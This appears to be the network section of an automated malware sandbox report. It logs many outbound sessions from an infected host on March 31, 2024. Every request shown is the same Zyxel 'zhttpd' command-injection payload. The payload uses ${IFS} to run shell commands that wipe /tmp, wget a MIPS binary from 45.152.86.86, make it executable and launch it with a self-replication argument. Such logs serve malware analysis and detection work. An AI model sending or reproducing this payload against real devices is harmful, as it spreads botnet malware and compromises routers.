                              Mar 31, 2024 08:41:19.720864058 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3308192.168.2.1343534173.82.248.42443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.720900059 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3309192.168.2.1350102150.227.51.120443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.720931053 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3310192.168.2.1354744163.92.179.209443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.720998049 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3311192.168.2.133662262.61.210.66443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.721025944 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3312192.168.2.1354516196.42.241.186443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.721075058 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3313192.168.2.136047049.136.10.225443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.721110106 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3314192.168.2.1344872170.38.35.40443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.721143961 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3315192.168.2.1339752160.97.101.102443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.721205950 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3316192.168.2.1353386141.69.227.10443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.721224070 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3317192.168.2.1345414150.67.103.49443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.721263885 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3318192.168.2.1343240212.168.46.84443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.721312046 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3319192.168.2.1339068211.182.45.144443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.721344948 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3320192.168.2.1351950205.53.179.74443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.721390009 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3321192.168.2.135588477.213.235.195443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.721450090 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3322192.168.2.1336776185.87.246.135443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.721484900 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3323192.168.2.1360456193.201.136.219443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.721537113 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3324192.168.2.1339042129.150.101.148443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.721579075 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3325192.168.2.134074479.194.192.251443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.721611023 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3326192.168.2.1334796221.62.113.151443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.721664906 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3327192.168.2.1337548187.87.114.190443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.721702099 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3328192.168.2.1338910202.114.224.180443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.721735954 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3329192.168.2.1349256129.45.233.179443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.721781015 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3330192.168.2.133974827.237.113.208443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.721801996 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3331192.168.2.135865043.205.25.109443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.721858978 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3332192.168.2.134995854.21.56.84443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.721908092 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3333192.168.2.1358802171.95.152.86443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.721956015 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3334192.168.2.1352638191.208.52.212443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.722003937 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3335192.168.2.134254678.221.92.149443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.722034931 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3336192.168.2.133327882.191.203.63443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.722065926 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3337192.168.2.1358878131.220.112.32443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.722130060 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3338192.168.2.1360866200.143.125.123443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.722163916 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3339192.168.2.1342434146.80.78.21443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.722217083 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3340192.168.2.1352206120.207.135.234443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.722227097 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3341192.168.2.1354014173.57.13.239443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.722278118 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3342192.168.2.1351218189.121.93.100443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.722306967 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3343192.168.2.13445282.230.254.247443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.722357035 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3344192.168.2.1338682194.175.34.159443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.722398996 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3345192.168.2.1339396180.216.234.42443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.722443104 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3346192.168.2.134445027.45.66.170443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.722507954 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3347192.168.2.133565219.235.42.234443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.722543955 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3348192.168.2.134894885.46.223.195443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.722574949 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3349192.168.2.135187895.121.184.37443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.722625971 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3350192.168.2.1347028131.74.178.16443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.722682953 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3351192.168.2.135115873.48.245.155443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.722733974 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3352192.168.2.134186647.10.24.214443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.722764015 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3353192.168.2.133546640.48.140.210443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.722809076 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3354192.168.2.1341014139.16.71.117443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.722862959 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3355192.168.2.1347010223.138.129.111443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.722882032 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3356192.168.2.1347224118.191.136.128443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.722939968 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3357192.168.2.134382888.173.64.192443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.722992897 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3358192.168.2.1344736187.54.152.63443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.723014116 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3359192.168.2.135950235.37.100.249443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.723047972 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3360192.168.2.1345158116.79.199.8443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.723102093 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3361192.168.2.1338712201.200.109.183443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.723139048 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3362192.168.2.1339642178.19.19.201443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.723169088 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3363192.168.2.1342894213.169.153.42443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.723223925 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3364192.168.2.1338164202.236.196.137443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.723273039 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3365192.168.2.134743077.154.73.207443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.723328114 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3366192.168.2.135446239.34.176.1443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.723356962 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3367192.168.2.135679820.148.45.102443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.723413944 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3368192.168.2.133916246.0.251.23443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.723436117 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3369192.168.2.1359590173.155.127.96443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.723484039 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3370192.168.2.1356230137.64.13.87443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.723506927 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3371192.168.2.1350600146.26.199.57443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.723545074 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3372192.168.2.1349494133.88.89.154443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.723604918 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3373192.168.2.1354568208.243.53.10443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.723645926 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3374192.168.2.1342686166.174.12.174443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.723706007 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3375192.168.2.134361242.243.227.12443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:19.723746061 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3376192.168.2.1349468132.49.100.33443
                              TimestampBytes transferredDirectionData
